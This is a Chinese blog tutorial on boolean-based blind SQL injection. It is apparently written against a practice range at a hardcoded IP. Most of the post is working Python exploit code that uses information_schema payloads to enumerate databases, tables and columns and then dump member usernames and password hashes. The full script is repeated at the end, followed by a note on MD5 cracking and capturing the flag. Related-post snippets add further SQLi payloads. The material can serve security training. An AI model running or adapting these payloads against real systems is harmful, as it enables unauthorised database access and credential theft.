sql注入之布尔盲注-脚本

最新推荐文章于 2024-04-30 21:19:09 发布
最新推荐文章于 2024-04-30 21:19:09 发布
阅读量2.9k 收藏 21
点赞数 2
文章标签: web 安全 mysql 脚本语言 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44628122/article/details/105938094
版权

先给大家普及一下

在MySQL中,把 information_schema 看作是一个数据库,确切说是信息数据库。其中保存着关于MySQL服务器所维护的所有其他数据库的信息。
information_schema数据库常用表说明:
SCHEMATA表:提供了当前mysql实例中所有数据库的信息。如show databases就是在这查询的
TABLES表:提供了关于数据库中的表的信息(包括视图)。如show tables from schemaname
COLUMNS表:提供了表中的列信息。如SHOW COLUMNS FROM FROM stormgroup.member`

这里找个靶场给大家演示一下
在这里插入图片描述
经过

and 1=1
and 1=2
确定数据类型为int且存在注入
猜测查询语句为
select * from 数据库.表 where id =可控

查有多少个数据库

def database_number():
    url = "http://219.153.49.228:49005/new_list.php?id=1 "
    for i in range (0,9):
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
        r = requests.get(url + payload)
        if '各位平台用户' in r.text:
            print('数据库的数量为:'+str(i))
            break

ord(s) s为字符串 返回c的ascii码
mid(string,start,len)
mid(web,1,1)返回w
ifnull(a,b)不为空返回a 空返回b
count(aaa) 统计aaa的数量
distinct() 去重 假如你有两张一样的表 则返回一张即可
cast(a as b) 将a转换为b型数据

在这里插入图片描述

查具体有哪些数据库:

def database_names():
    name = ''
    names = ''
    LEN = 0
    for h in range(0, 5):
        print(h)
        for l in range(1,20):
            url = "http://219.153.49.228:49005/new_list.php?id=1 "
        for j in range(1, 18):
            for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:49005/new_list.php?id=1 "
                payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
                r = requests.get(url + payload2)
               # print(r)
                #print(len(r.text))
                if len(r.text) == 801:
                    name = name + i
                    print(name)
                    #print(type(name))
                    break
        print('database_name:', name)
        names = names + "\t" + name
        name = ''
    print(names)

在这里插入图片描述

查当前数据库:

def current_dbs():
    name = ''
    for j in range(1, 15):
        for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
            url = "http://219.153.49.228:47875/new_list.php?id=1 "
            payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
            payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
            #print(url+'%23')
            r = requests.get(url + payload2)
            #print(r)
            if '各位平台用户' in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)

在这里插入图片描述

看stormgroup有多少张表

def tables_number():
    for j in range(1, 10):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
        r = requests.get(url+payload)
        if len(r.text) == 801:
            print('该数据库的表数为:'+str(j))
            break

在这里插入图片描述

爆表

def table_name():
    name = ''
    names = ''
    for i in range(0, 2):
        for h in range(1,10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url+payload)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('table:'+name)
        names = names + "\t" + name
        name = ''
    print('current database have:'+names)

在这里插入图片描述

查字段数量

def columns_number():
    for i in range(1,5):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
        r = requests.get(url + payload)
        #print(r)
        if len(r.text) == 801:
            print('当前表有'+str(i)+'个字段')

在这里插入图片描述

列字段

def columns_name():
    name = ''
    names = ''
    for i in range(0, 3):
        for h in range(1, 10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                # print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('columns:' + name)
        names = names + "\t" + name
        name = ''
    print('columns:' + names)

在这里插入图片描述

dump数据

def dump():
    name = ''
    names = ''
    password = ''
    passwords = ''
    for i in range(0, 3):
        for h in range(1, 34):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
                url = "http://219.153.49.228:45953/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                r1 = requests.get(url + payload1)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    #print(name)
                    # print(type(name))
                if len(r1.text) == 801:
                    password = password + j
                    #print(password)
                    # print(type(name))
        print('username:' + name)
        names = names + "\t" + name
        name = ''
        print('password:' + password)
        passwords = passwords + "\t" + password
        password = ''
    #print('username:' + names)
    print('password:'+ passwords)

在这里插入图片描述

md5解密

在这里插入图片描述

Capture the flag

在这里插入图片描述

全代码如下

__author__ = "星空下de青铜"
import requests
def database_number():
    url = "http://219.153.49.228:49005/new_list.php?id=1 "
    for i in range (0,9):
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))=ord('%d')" %i
        r = requests.get(url + payload)
        if '各位平台用户' in r.text:
            print('数据库的数量为:'+str(i))
            break


def database_names():
    name = ''
    names = ''
    LEN = 0
    for h in range(0, 5):
        print(h)
        for l in range(1,20):
            url = "http://219.153.49.228:49005/new_list.php?id=1 "
        for j in range(1, 18):
            for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:49005/new_list.php?id=1 "
                payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT %d,1),%d,1)) = ord('%s')" % (h,j, i)
                r = requests.get(url + payload2)
               # print(r)
                #print(len(r.text))
                if len(r.text) == 801:
                    name = name + i
                    print(name)
                    #print(type(name))
                    break
        print('database_name:', name)
        names = names + "\t" + name
        name = ''
    print(names)




def current_dbs():
    name = ''
    for j in range(1, 15):
        for i in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
            url = "http://219.153.49.228:47875/new_list.php?id=1 "
            payload1 = "and substr(database(),%d,1)='%s'" % (j, i)
            payload2 = "AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20))FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),%d,1)) = ord('%s')" % (j, i)
            #print(url+'%23')
            r = requests.get(url + payload2)
            #print(r)
            if '各位平台用户' in r.text:
                name = name + i
                print(name)
                break
    print('database_name:', name)

def tables_number():
    for j in range(1, 10):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570),1,1))=ord(%d)" %(j)
        r = requests.get(url+payload)
        if len(r.text) == 801:
            print('该数据库的表数为:'+str(j))
            break


def table_name():
    name = ''
    names = ''
    for i in range(0, 2):
        for h in range(1,10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url+payload)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('table:'+name)
        names = names + "\t" + name
        name = ''
    print('current database have:'+names)

def columns_number():
    for i in range(1,5):
        url = "http://219.153.49.228:47875/new_list.php?id=1 "
        payload = "AND ORD(MID((SELECT IFNULL(CAST(COUNT(column_name)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570),1,1))=ORD(%d)" %(i)
        r = requests.get(url + payload)
        #print(r)
        if len(r.text) == 801:
            print('当前表有'+str(i)+'个字段')


def columns_name():
    name = ''
    names = ''
    for i in range(0, 3):
        for h in range(1, 10):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_':
                url = "http://219.153.49.228:47875/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(column_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6D656D626572 AND table_schema=0x73746F726D67726F7570 LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                # print(r)
                if len(r.text) == 801:
                    name = name + j
                    print(name)
                    # print(type(name))
                    break
        print('columns:' + name)
        names = names + "\t" + name
        name = ''
    print('columns:' + names)


def dump():
    name = ''
    names = ''
    password = ''
    passwords = ''
    for i in range(0, 3):
        for h in range(1, 34):
            for j in 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_1234567890':
                url = "http://219.153.49.228:45953/new_list.php?id=1 "
                payload = "AND ORD(MID((SELECT IFNULL(CAST(`name` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                payload1 = "AND ORD(MID((SELECT IFNULL(CAST(`password` AS NCHAR),0x20) FROM stormgroup.`member` ORDER BY `name` LIMIT %d,1),%d,1))=ord('%s')" % (i, h, j)
                r = requests.get(url + payload)
                r1 = requests.get(url + payload1)
                #print(r)
                if len(r.text) == 801:
                    name = name + j
                    #print(name)
                    # print(type(name))
                if len(r1.text) == 801:
                    password = password + j
                    #print(password)
                    # print(type(name))
        print('username:' + name)
        names = names + "\t" + name
        name = ''
        print('password:' + password)
        passwords = passwords + "\t" + password
        password = ''
    #print('username:' + names)
    print('password:'+ passwords)


dump()
#columns_name()
#columns_number()
#table_name()
#tables_number()
#current_dbs()
#database_names()
#database_number()

结语:小编小菜鸡一个,花了一天才写出来的。里面也没有运用啥算法优化,在dump数据的时候会
   很慢,建议运用二分法优化一下
   其中查表数量啥的只是为了爆表的时候少循环几次,可以合二为一,把得到的表的数量传参到包表那里 或者弄个全局变量就ok了
   小编实在等不及和大家分享了 后续有啥再和大家一起进步吧 ^_^

星空下de青铜
关注
  • 2
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
网络对抗课程SQL注入实验
xidianwuyanzu的博客
07-22 748
网络对抗实验二 1. 搭建 mysql 数据库,建立数据库 test,数据表 student,包含 id、name、score 三列。 2、环境:nginx+php-fpm 3、接口程序按老师给的资料里的php文件略微修改一下 根据输入的参数值,拼接SQL查询语句并执行,将查询结果展示。如根据输入的学号展示姓名和分数。(1.php) 手工sql注入:得到全部信息 根据输入的参数值,拼接 SQL 查询语句并执行,展示查询结果是否为空。如输入学号,展示是
sql注入-布尔盲注
课嗨教育的专栏
04-28 169
讲师:韩进 什么时候使用布尔盲注 在页面没有显示位的时候使用盲注 length(database())=1 获取到了数据库长度 请求:localhost/Less-8/index.php?id=1%27%20and%20length(database())=8%20--%2011 返回:正常 用到两个函数 substring 截取字符串(1.截取哪个字符串, 2 从哪一位开始,3 取几位) 获取数据库库名: http://localhost/Less-8/index.php?id=1%27%20an.
实验吧 Zcrypt(ASIS CTF 2015) BY Assassin
Assassin
02-06 708
首先我们得到了一个文件,用hex editor看一下发现是个压缩文件,解压后得到一个log文件!用notepad打开发现是一个日志文件!我们看2696行解密发现 AND 8366=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(column_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE tabl
2024年Python最全Python自动化sql注入布尔盲注_布尔盲注脚本
最新发布
2301_82244514的博客
04-30 307
将payload与网址进行拼接,使用requests包来访问网站,根据返回页面是否有flag出现来确认是否成功。需要用到requests包来建立连接访问目标地址,根据回显特征进行下一步操作,这里正确标志是"You are in…获取数量(有多少张表)–> 获取每张表表名的长度 --> 获取具体的表名。
web安全入门之SQL注入-布尔盲注
weixin_43726831的博客
09-16 992
SQL注入盲注
35分钟了解sql注入-盲注(三)
贤鱼的博客
09-29 942
一文了解sql注入-盲注
Python自动化sql注入布尔盲注
qq_46145027的博客
04-22 3266
sql注入时,使用python脚本可以大大提高注入效率,这里演示一下编写python脚本实现布尔盲注的基本流程:演示靶场:sqli-labs。
sql注入布尔盲注
笔墨稠思
11-13 160
什么是盲注? 所谓盲注,就是在服务器没有错误回显的时候完成注入攻击 什么是布尔盲注? 布尔,这个词很明显,他会根据我们输入的注入信息,返回True和False,没有其他的任何报错信息 实现布尔盲注需要利用一下几个函数 length() 返回字符串长度 substr() 截取字符串 ascii() 返回字符的ascii码 靶场实战: 我们发现这个靶场为get传参,参数为id = 1 首先我们判断是否存在注入 我们把传参改为id = 2 - 1 发现数据返
布尔盲注.py_sql盲注python_
10-03
一个简单的sql注入盲注的python脚本,其中语句需要根据环境条件做改变
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL盲注脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
SQL住入原始脚本_SQL注入python脚本_
10-03
用于SQL注入,打开SQLmap运行脚本布尔盲注 延时注入
SQL脚本_UI_sql注入_sql_
10-01
sql注入UI实现,包括报错注入,基于布尔盲注,基于时间得盲注
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+...具体涉及:报错型注入,报错型盲注布尔盲注,延时型盲注,POST数据盲注。 资料参考:https://blog.csdn.net/Kevinhanser/article/details/81215985
SQL盲注及python脚本编写
nobugnomoney的博客
05-18 3437
1、什么是盲注 盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类 基于布尔 SQL 盲注 基于时间的 SQL 盲注 基于报错的 SQL 盲注 0x01.基于布尔 SQL 盲注----------构造逻辑判断 left() :left(a,b)从左侧截取 a 的前 b 位 accii():Ascii()将某个字符转换 为 ascii
SQL注入:sqlmap布尔盲注payload解析
无名J0kзr的博客
10-07 3822
难受 占坑明天更
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 570
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
python布尔盲注脚本
kiihuang的博客
03-28 488
使用python,编写一个可以自动爆破的布尔盲注脚本,根据不同情况调整里面的Content-Length的值。
SQL注入-布尔盲注
acepanhuan的博客
02-10 1640
学习SQL注入方法之盲注
SQL注入——布尔盲注 / Python 脚本爆破
weixin_51559599的博客
11-06 971
phpstudy 的数据库交互太慢,改用 xampp,但 xampp 中无数据库 ‘cms’ ,需要将 phpstudy 中的 cms 数据库导入 xampp 中的数据库(phpstudy 和 xampp 使用的不是同一个数据库)页面中有布尔类型的状态,可以根据布尔类型状态,对数据库中的内容进行判断。登录数据库,创建 cms 数据库,进入 cms 数据库,导入数据库。未返回新闻页面,说明数据库名第一个字母不为 “s”可知,当后面的语句为真时,显示新闻页面。多次判断,最后可知数据库名长度为3。
sql注入布尔盲注脚本
08-23
对于SQL注入布尔盲注攻击,你可以使用以下脚本示例: ``` SELECT * FROM users WHERE username = 'admin' AND IF(LENGTH(database()) > 1, SLEEP(5), 0); SELECT * FROM users WHERE username = 'admin' AND IF...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值